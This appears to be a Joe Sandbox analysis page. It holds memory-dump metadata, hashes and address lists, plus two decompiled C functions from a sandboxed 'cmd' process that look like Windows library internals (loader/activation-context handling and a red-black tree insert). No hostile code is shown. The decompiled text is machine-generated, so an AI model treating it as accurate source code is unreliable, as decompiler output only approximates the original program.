0x036e416e
0x036e416e
0x036e4175
0x036e4498
0x036e449f
0x0372e12d
0x00000000
0x0372e133
0x00000000
0x0372e133
0x036e44a5
0x036e44a5
0x036e44aa
0x00000000
0x036e44bb
0x036e44ca
0x036e44d6
0x036e44d7
0x036e44d8
0x036e44e3
0x036e44e3
0x036e44aa
0x036e417b
0x036e417b
0x036e417b
0x00000000
0x036e417b
0x036e4175
0x00000000

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5005c7467a9c3341e53b8c86943ed99bef30b6892dafd001ab5b7cec13ce3201
Instruction ID: 214171b3cfaeade0dfa500550a662b9db099de800ebf653380524690ad3d704f
Opcode Fuzzy Hash: 5005c7467a9c3341e53b8c86943ed99bef30b6892dafd001ab5b7cec13ce3201
Instruction Fuzzy Hash: A4F17C756093118FC725CF2AC484A3AB7E1EF88704F58496EF496CB790EB34D989CB52

Uniqueness

Uniqueness Score: -1.00%

Function 036F20A0 Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E036F20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x37b8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E036F2EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E036F2EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E036C58EC(_t240);
									_t221 =  *0x37b5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x37b5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E03704A2C(0x37b6e40, 0x3704b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E036E7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x36a5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E036FF6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E036FF6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E03747016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L036E2400(_t267 + 0x20);
															}
															L036E2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E036F2397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E036E2280(_t134, 0x37b8608);
									__eflags =  *0x37b6e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E036DFFB0(_t198, _t241, 0x37b8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x37b6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x37b8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E036F6B90(_t210,  &_v64);
										_t262 =  *0x37b8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E036FE180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E037097C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0370006A(0x37b8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x37b8608);
												E0370B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x37b6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x37b6e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E036DFFB0(_t198, _t240, 0x37b8608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E037000C2(0x37b8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x036f20a0
0x036f20a8
0x036f20ad
0x036f20b3
0x036f20b8
0x036f20c2
0x036f20c7
0x036f20cb
0x036f20d2
0x036f2263
0x036f2266
0x03735836
0x03735836
0x00000000
0x036f226c
0x036f226c
0x036f2270
0x036f2274
0x036f20e2
0x036f20e2
0x036f20e6
0x036f20ee
0x037357dc
0x037357de
0x037357ec
0x037357ec
0x037357f1
0x037357f3
0x037357f8
0x00000000
0x037357f8
0x037357e0
0x037357e4
0x037357ea
0x00000000
0x00000000
0x00000000
0x037357ea
0x036f20f4
0x036f20f4
0x036f20f8
0x036f20f8
0x036f20fc
0x036f2100
0x036f2106
0x036f2201
0x036f2206
0x036f220b
0x036f220e
0x036f22a9
0x036f22ac
0x00000000
0x00000000
0x036f22b2
0x036f22b5
0x03735801
0x03735806
0x00000000
0x00000000
0x03735810
0x03735815
0x03735818
0x00000000
0x00000000
0x0373581e
0x036f22bb
0x036f22bb
0x036f2218
0x036f2218
0x036f221c
0x036f2220
0x036f2222
0x036f22c2
0x036f22c4
0x036f22dc
0x036f22dc
0x036f22e1
0x00000000
0x00000000
0x00000000
0x036f22e7
0x036f22c8
0x036f22cd
0x036f22d3
0x036f22d6
0x03735823
0x03735825
0x03735827
0x00000000
0x00000000
0x0373582d
0x00000000
0x0373582d
0x00000000
0x036f2228
0x036f2228
0x00000000
0x036f2228
0x036f2222
0x036f2214
0x036f2214
0x00000000
0x036f2114
0x036f2114
0x036f2114
0x036f211a
0x036f211c
0x036f2348
0x036f234d
0x03735840
0x03735845
0x03735848
0x0373584e
0x0373584e
0x03735848
0x036f2353
0x036f2355
0x036f2388
0x036f2388
0x036f2368
0x036f236a
0x036f236c
0x036f238f
0x00000000
0x036f236e
0x036f236e
0x036f218e
0x036f218e
0x036f2191
0x036f2195
0x03735a03
0x03735a06
0x03735a0c
0x03735a0f
0x03735a11
0x03735a13
0x03735a13
0x03735a19
0x03735a1f
0x00000000
0x036f219b
0x036f219b
0x036f21a0
0x036f2282
0x036f2284
0x036f2284
0x036f2284
0x036f2284
0x036f21a6
0x036f21a9
0x036f21ac
0x036f21ae
0x036f21b3
0x036f228b
0x036f2290
0x036f2379
0x036f2296
0x036f2298
0x036f2298
0x036f2290
0x036f21b9
0x036f21be
0x036f22a2
0x036f22a2
0x036f21c4
0x036f21c8
0x036f21cc
0x036f21d0
0x036f21d4
0x036f21de
0x036f21e3
0x03735a29
0x03735a2c
0x00000000
0x00000000
0x03735a3b
0x00000000
0x036f21e9
0x036f21e9
0x036f21e9
0x036f21ee
0x036f21f1
0x03735a45
0x03735a4b
0x03735a52
0x03735a58
0x03735a5d
0x03735a5f
0x03735a71
0x03735a61
0x03735a6a
0x03735a6a
0x03735a76
0x03735a79
0x03735a7f
0x03735a83
0x03735a85
0x03735a87
0x03735a87
0x03735a8c
0x03735a91
0x03735a97
0x03735a9f
0x03735aa0
0x03735aa1
0x03735aa6
0x03735aab
0x03735ab1
0x03735ab3
0x03735ab9
0x03735aca
0x03735ad4
0x03735ad4
0x03735ade
0x03735ade
0x03735aab
0x03735a79
0x03735a52
0x036f21f7
0x036f21f9
0x036f21fe
0x036f21fe
0x036f21e3
0x036f2195
0x036f236c
0x036f2122
0x036f2122
0x036f2124
0x036f2231
0x036f2236
0x036f2236
0x036f2238
0x036f2238
0x036f2240
0x036f2242
0x036f2244
0x037359fc
0x036f218c
0x036f218c
0x00000000
0x036f218c
0x036f224a
0x036f224f
0x036f2256
0x036f2304
0x036f2309
0x036f230f
0x036f231e
0x036f231e
0x036f231e
0x036f2320
0x036f2325
0x036f232a
0x036f232c
0x036f233e
0x036f233e
0x00000000
0x036f232c
0x036f2311
0x036f2317
0x036f231a
0x036f231c
0x036f2380
0x036f2380
0x036f2380
0x036f2384
0x00000000
0x00000000
0x036f2386
0x00000000
0x036f231c
0x036f225c
0x036f225c
0x00000000
0x036f225c
0x036f212a
0x036f2134
0x036f2138
0x036f213d
0x03735858
0x03735863
0x03735863
0x03735867
0x0373586a
0x00000000
0x00000000
0x0373586c
0x0373586c
0x03735871
0x03735875
0x03735877
0x03735997
0x0373599c
0x037359a1
0x037359a7
0x037359a7
0x00000000
0x037359a7
0x0373587d
0x00000000
0x0373588b
0x0373588b
0x03735890
0x03735892
0x03735894
0x03735899
0x0373589b
0x037358a0
0x037358a0
0x037358aa
0x037358b2
0x037358b6
0x037358be
0x037358c6
0x037358c9
0x0373590d
0x03735917
0x0373591a
0x0373591c
0x03735920
0x03735928
0x0373592a
0x0373592c
0x0373592e
0x0373592e
0x037358cb
0x037358cd
0x037358d8
0x037358e0
0x037358f4
0x037358fe
0x037358fe
0x0373593a
0x0373593e
0x03735940
0x03735942
0x00000000
0x03735944
0x03735944
0x03735949
0x0373594e
0x0373594e
0x03735953
0x0373595b
0x03735976
0x03735976
0x0373597a
0x0373597f
0x00000000
0x00000000
0x00000000
0x00000000
0x03735981
0x03735981
0x03735981
0x03735983
0x03735988
0x0373598d
0x03735991
0x03735991
0x00000000
0x0373595d
0x0373595d
0x03735963
0x03735965
0x00000000
0x00000000
0x00000000
0x00000000
0x03735967
0x03735967
0x0373596b
0x0373596d
0x00000000
0x00000000
0x0373596f
0x03735971
0x03735971
0x03735974
0x00000000
0x00000000
0x00000000
0x03735974
0x00000000
0x03735967
0x0373595b
0x03735942
0x03735863
0x036f2143
0x036f2143
0x036f2149
0x036f214f
0x036f22f1
0x036f22f6
0x00000000
0x036f2173
0x036f2173
0x036f217d
0x036f2181
0x036f2186
0x037359ae
0x037359b2
0x037359b5
0x037359b7
0x037359ba
0x037359cd
0x037359d1
0x037359d5
0x037359d9
0x037359db
0x00000000
0x00000000
0x037359dd
0x037359dd
0x037359e1
0x037359e4
0x037359e7
0x037359ee
0x037359ee
0x037359f3
0x037359f3
0x00000000
0x036f2186
0x036f214f
0x036f2106
0x036f2266
0x036f20d8
0x036f20da
0x036f20e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1963c60280fbbdfdb5c17c2cbe124b646d72cb4a52923905cd7079647944994
Instruction ID: e09ef8830819dcaca1f920599fe8ff846b0a3da3dbc7460e5c427053442e3010
Opcode Fuzzy Hash: c1963c60280fbbdfdb5c17c2cbe124b646d72cb4a52923905cd7079647944994
Instruction Fuzzy Hash: 84F16779A083459FD725CF28C85076BBBE9BF86324F08895DEA958B381D734D841CF86

Uniqueness

Uniqueness Score: -1.00%

Function 036DB090 Relevance: .4, Instructions: 405
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E036DB090(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t117;
				signed int _t119;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t134;
				signed int _t139;
				signed char _t143;
				signed int _t144;
				signed int _t146;
				signed int _t148;
				signed int* _t150;
				signed int _t152;
				signed int _t161;
				signed char _t165;
				signed int _t167;
				signed int _t170;
				signed int _t174;
				signed char _t177;
				signed int _t178;
				signed int _t181;
				signed int _t182;
				signed int _t187;
				signed int _t190;
				signed int _t192;
				signed int _t194;
				signed int _t196;
				signed int _t199;
				signed int _t202;
				signed int _t208;
				signed int _t211;

				_t182 = _a16;
				_t178 = _a8;
				_t161 = _a4;
				 *_t182 = 0;
				 *(_t182 + 4) = 0;
				_t5 = _t161 + 4; // 0x4
				_t117 =  *_t5 & 0x00000001;
				if(_t178 == 0) {
					 *_t161 = _t182;
					 *(_t161 + 4) = _t182;
					if(_t117 != 0) {
						_t117 = _t182 | 0x00000001;
						 *(_t161 + 4) = _t117;
					}
					 *(_t182 + 8) = 0;
					goto L43;
				} else {
					_t208 = _t182 ^ _t178;
					_t192 = _t208;
					if(_t117 == 0) {
						_t192 = _t182;
					}
					_t117 = _a12 & 0x000000ff;
					 *(_t178 + _t117 * 4) = _t192;
					if(( *(_t161 + 4) & 0x00000001) == 0) {
						_t208 = _t178;
					}
					 *(_t182 + 8) = _t208 | 0x00000001;
					if(_a12 == 0) {
						_t14 = _t161 + 4; // 0x4
						_t177 =  *_t14;
						_t117 = _t177 & 0xfffffffe;
						if(_t178 == _t117) {
							_t117 = _a4;
							 *(_t117 + 4) = _t182;
							if((_t177 & 0x00000001) != 0) {
								_t161 = _a4;
								_t117 = _t182 | 0x00000001;
								 *(_t161 + 4) = _t117;
							} else {
								_t161 = _t117;
							}
						} else {
							_t161 = _a4;
						}
					}
					if(( *(_t178 + 8) & 0x00000001) == 0) {
						L42:
						L43:
						return _t117;
					} else {
						_t19 = _t161 + 4; // 0x4
						_t165 =  *_t19 & 0x00000001;
						do {
							_t211 =  *(_t178 + 8) & 0xfffffffc;
							if(_t165 != 0) {
								if(_t211 != 0) {
									_t211 = _t211 ^ _t178;
								}
							}
							_t119 =  *_t211;
							if(_t165 != 0) {
								if(_t119 != 0) {
									_t119 = _t119 ^ _t211;
								}
							}
							_t120 = 0;
							_t121 = _t120 & 0xffffff00 | _t119 != _t178;
							_v8 = _t121;
							_t122 = _t121 ^ 0x00000001;
							_v16 = _t122;
							_t123 =  *(_t211 + _t122 * 4);
							if(_t165 != 0) {
								if(_t123 == 0) {
									goto L20;
								}
								_t123 = _t123 ^ _t211;
								goto L13;
							} else {
								L13:
								if(_t123 == 0 || ( *(_t123 + 8) & 0x00000001) == 0) {
									L20:
									_t194 = _v16;
									if((_a12 & 0x000000ff) != _v8) {
										_t126 =  *(_t182 + 8) & 0xfffffffc;
										_t167 = _t165 & 1;
										_v12 = _t167;
										if(_t167 != 0) {
											if(_t126 != 0) {
												_t126 = _t126 ^ _t182;
											}
										}
										if(_t126 != _t178) {
											L83:
											_t178 = 0x1d;
											asm("int 0x29");
											goto L84;
										} else {
											_t126 =  *(_t178 + _t194 * 4);
											if(_t167 != 0) {
												if(_t126 != 0) {
													_t126 = _t126 ^ _t178;
												}
											}
											if(_t126 != _t182) {
												goto L83;
											} else {
												_t126 =  *(_t211 + _v8 * 4);
												if(_t167 != 0) {
													if(_t126 != 0) {
														_t126 = _t126 ^ _t211;
													}
												}
												if(_t126 != _t178) {
													goto L83;
												} else {
													_t77 = _t178 + 8; // 0x8
													_t150 = _t77;
													_v20 = _t150;
													_t126 =  *_t150 & 0xfffffffc;
													if(_t167 != 0) {
														if(_t126 != 0) {
															_t126 = _t126 ^ _t178;
														}
													}
													if(_t126 != _t211) {
														goto L83;
													} else {
														_t202 = _t211 ^ _t182;
														_t152 = _t202;
														if(_t167 == 0) {
															_t152 = _t182;
														}
														 *(_t211 + _v8 * 4) = _t152;
														_t170 = _v12;
														if(_t170 == 0) {
															_t202 = _t211;
														}
														 *(_t182 + 8) =  *(_t182 + 8) & 0x00000003 | _t202;
														_t126 =  *(_t182 + _v8 * 4);
														if(_t170 != 0) {
															if(_t126 == 0) {
																L58:
																if(_t170 != 0) {
																	if(_t126 != 0) {
																		_t126 = _t126 ^ _t178;
																	}
																}
																 *(_t178 + _v16 * 4) = _t126;
																_t199 = _t178 ^ _t182;
																if(_t170 != 0) {
																	_t178 = _t199;
																}
																 *(_t182 + _v8 * 4) = _t178;
																if(_t170 == 0) {
																	_t199 = _t182;
																}
																 *_v20 =  *_v20 & 0x00000003 | _t199;
																_t178 = _t182;
																_t167 =  *((intOrPtr*)(_a4 + 4));
																goto L21;
															}
															_t126 = _t126 ^ _t182;
														}
														if(_t126 != 0) {
															_t167 =  *(_t126 + 8);
															_t194 = _t167 & 0xfffffffc;
															if(_v12 != 0) {
																L84:
																if(_t194 != 0) {
																	_t194 = _t194 ^ _t126;
																}
															}
															if(_t194 != _t182) {
																goto L83;
															}
															if(_v12 != 0) {
																_t196 = _t126 ^ _t178;
															} else {
																_t196 = _t178;
															}
															 *(_t126 + 8) = _t167 & 0x00000003 | _t196;
															_t170 = _v12;
														}
														goto L58;
													}
												}
											}
										}
									}
									L21:
									_t182 = _v8 ^ 0x00000001;
									_t126 =  *(_t178 + 8) & 0xfffffffc;
									_v8 = _t182;
									_t194 = _t167 & 1;
									if(_t194 != 0) {
										if(_t126 != 0) {
											_t126 = _t126 ^ _t178;
										}
									}
									if(_t126 != _t211) {
										goto L83;
									} else {
										_t134 = _t182 ^ 0x00000001;
										_v16 = _t134;
										_t126 =  *(_t211 + _t134 * 4);
										if(_t194 != 0) {
											if(_t126 != 0) {
												_t126 = _t126 ^ _t211;
											}
										}
										if(_t126 != _t178) {
											goto L83;
										} else {
											_t167 = _t211 + 8;
											_t182 =  *_t167 & 0xfffffffc;
											_v20 = _t167;
											if(_t194 != 0) {
												if(_t182 == 0) {
													L80:
													_t126 = _a4;
													if( *_t126 != _t211) {
														goto L83;
													}
													 *_t126 = _t178;
													L34:
													if(_t194 != 0) {
														if(_t182 != 0) {
															_t182 = _t182 ^ _t178;
														}
													}
													 *(_t178 + 8) =  *(_t178 + 8) & 0x00000003 | _t182;
													_t139 =  *((intOrPtr*)(_t178 + _v8 * 4));
													if(_t194 != 0) {
														if(_t139 == 0) {
															goto L37;
														}
														_t126 = _t139 ^ _t178;
														goto L36;
													} else {
														L36:
														if(_t126 != 0) {
															_t167 =  *(_t126 + 8);
															_t182 = _t167 & 0xfffffffc;
															if(_t194 != 0) {
																if(_t182 != 0) {
																	_t182 = _t182 ^ _t126;
																}
															}
															if(_t182 != _t178) {
																goto L83;
															} else {
																if(_t194 != 0) {
																	_t190 = _t126 ^ _t211;
																} else {
																	_t190 = _t211;
																}
																 *(_t126 + 8) = _t167 & 0x00000003 | _t190;
																_t167 = _v20;
																goto L37;
															}
														}
														L37:
														if(_t194 != 0) {
															if(_t139 != 0) {
																_t139 = _t139 ^ _t211;
															}
														}
														 *(_t211 + _v16 * 4) = _t139;
														_t187 = _t211 ^ _t178;
														if(_t194 != 0) {
															_t211 = _t187;
														}
														 *(_t178 + _v8 * 4) = _t211;
														if(_t194 == 0) {
															_t187 = _t178;
														}
														_t143 =  *_t167 & 0x00000003 | _t187;
														 *_t167 = _t143;
														_t117 = _t143 | 0x00000001;
														 *_t167 = _t117;
														 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
														goto L42;
													}
												}
												_t182 = _t182 ^ _t211;
											}
											if(_t182 == 0) {
												goto L80;
											}
											_t144 =  *(_t182 + 4);
											if(_t194 != 0) {
												if(_t144 != 0) {
													_t144 = _t144 ^ _t182;
												}
											}
											if(_t144 == _t211) {
												if(_t194 != 0) {
													_t146 = _t182 ^ _t178;
												} else {
													_t146 = _t178;
												}
												 *(_t182 + 4) = _t146;
												goto L34;
											} else {
												_t126 =  *_t182;
												if(_t194 != 0) {
													if(_t126 != 0) {
														_t126 = _t126 ^ _t182;
													}
												}
												if(_t126 != _t211) {
													goto L83;
												} else {
													if(_t194 != 0) {
														_t148 = _t182 ^ _t178;
													} else {
														_t148 = _t178;
													}
													 *_t182 = _t148;
													goto L34;
												}
											}
										}
									}
								} else {
									 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
									_t182 = _t211;
									 *(_t123 + 8) =  *(_t123 + 8) & 0x000000fe;
									_t174 = _a4;
									_t117 =  *(_t211 + 8);
									_t181 = _t117 & 0xfffffffc;
									if(( *(_t174 + 4) & 0x00000001) != 0) {
										if(_t181 == 0) {
											goto L42;
										}
										_t178 = _t181 ^ _t211;
									}
									if(_t178 == 0) {
										goto L42;
									}
									goto L17;
								}
							}
							L17:
							 *(_t211 + 8) = _t117 | 0x00000001;
							_t40 = _t174 + 4; // 0x4
							_t117 =  *_t178;
							_t165 =  *_t40 & 0x00000001;
							if(_t165 != 0) {
								if(_t117 != 0) {
									_t117 = _t117 ^ _t178;
								}
							}
							_a12 = _t211 != _t117;
						} while (( *(_t178 + 8) & 0x00000001) != 0);
						goto L42;
					}
				}
			}

0x036db095
0x036db09b
0x036db09f
0x036db0a5
0x036db0a7
0x036db0aa
0x036db0ad
